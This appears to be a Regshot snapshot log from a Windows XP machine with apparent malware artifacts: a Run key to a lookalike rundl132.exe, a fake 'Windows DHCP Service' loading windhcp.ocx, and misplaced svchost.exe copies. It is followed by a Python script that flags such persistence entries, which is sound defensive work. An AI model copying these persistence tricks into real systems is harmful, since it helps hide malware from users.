C:\Documents and Settings\ufo\Local Settings\History\History.IE5\MSHist012007012520070126\index.dat
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\ufo\NTUSER.DAT.LOG
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
C:\WINDOWS\system32\CatRoot2\edb.chk
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP

----------------------------------
添加目录:6
----------------------------------
C:\Documents and Settings\ufo\Local Settings\Application Data\Microsoft\Internet Explorer
C:\Documents and Settings\ufo\Local Settings\Application Data\Microsoft\Internet Explorer\.
C:\Documents and Settings\ufo\Local Settings\Application Data\Microsoft\Internet Explorer\..
C:\WINDOWS\uninstall
C:\WINDOWS\uninstall\.
C:\WINDOWS\uninstall\..

----------------------------------
总计:183
----------------------------------
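An added example, not part of the original post, of triaging a Regshot log like the one above for persistence: it pulls `Run` values and auto-start services out of the 添加键值 (values added) section and flags new executables in the 添加文件 (files added) section whose names imitate Windows system files. `LOG` is a short excerpt copied from the post; the function names and the heuristics are choices made here.

```python
import ntpath
import re

# Excerpt copied from the Regshot log in the post above (not the full log).
LOG = r'''
----------------------------------
添加键值:61
----------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\load: "C:\WINDOWS\uninstall\rundl132.exe"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\ImagePath: "C:\WINDOWS\system32\rundll32.exe windhcp.ocx,start"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDHCPsvc\DisplayName: "Windows DHCP Service"
----------------------------------
添加文件:75
----------------------------------
C:\Documents and Settings\ufo\Local Settings\Temp\Wolvez.Com
C:\Documents and Settings\ufo\Local Settings\Temporary Internet Files\Content.IE5\01YB0HQ7\bg_all[1].gif
C:\Program Files\Internet Explorer\SVCHOST.EXE
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\svchost.exe
C:\WINDOWS\uninstall\rundl132.exe
'''

SECTION = re.compile(r'^(\S+?)[::](\d+)$')           # e.g. "添加键值:61"
VALUE = re.compile(r'^(HKEY_[^:]+?)\\([^\\:]+): (.*)$')  # key \ value name : data
SERVICE = re.compile(r'\\CurrentControlSet\\Services\\([^\\]+)$')
SYSTEM_NAMES = {"svchost.exe", "smss.exe", "rundll32.exe"}
SYSTEM_DIR = r"c:\windows\system32"

def classify_file(path):
    """Return a label for a newly added file, or None if it is not of interest."""
    name = ntpath.basename(path).lower()
    folder = ntpath.dirname(path).lower()
    if "temporary internet files" in folder:
        return None  # browser cache copy, not an installed file
    if name in SYSTEM_NAMES and folder != SYSTEM_DIR:
        return "system-name-wrong-folder"
    if name not in SYSTEM_NAMES and name.replace("1", "l").replace("0", "o") in SYSTEM_NAMES:
        return "lookalike-name"  # digit swapped in for a letter, e.g. rundl132
    if name.endswith((".exe", ".com", ".ocx", ".dll")):
        return "new-executable"
    return None

def triage(log):
    """Return (kind, name, detail) tuples for autoruns, services and suspicious files."""
    section, services, findings = None, {}, []
    for line in (raw.strip() for raw in log.splitlines()):
        header = SECTION.match(line)
        if header:
            section = header.group(1)
        elif section == "添加键值" and VALUE.match(line):   # values added
            key, name, data = VALUE.match(line).groups()
            data = data.strip('"')
            if key.lower().endswith(r"\currentversion\run"):
                findings.append(("autorun", name, data))
            svc = SERVICE.search(key)
            if svc and name in ("ImagePath", "Start"):
                services.setdefault(svc.group(1), {})[name] = data
        elif section == "添加文件" and line[1:3] == ":\\":  # files added
            kind = classify_file(line)
            if kind:
                findings.append((kind, ntpath.basename(line), line))
    for svc, vals in services.items():
        if "ImagePath" in vals:
            auto = int(vals.get("Start", "0x3"), 16) == 2  # Start=2 means auto-start
            findings.append(("auto-start-service" if auto else "service", svc, vals["ImagePath"]))
    return findings

if __name__ == "__main__":
    for finding in triage(LOG):
        print(finding)
```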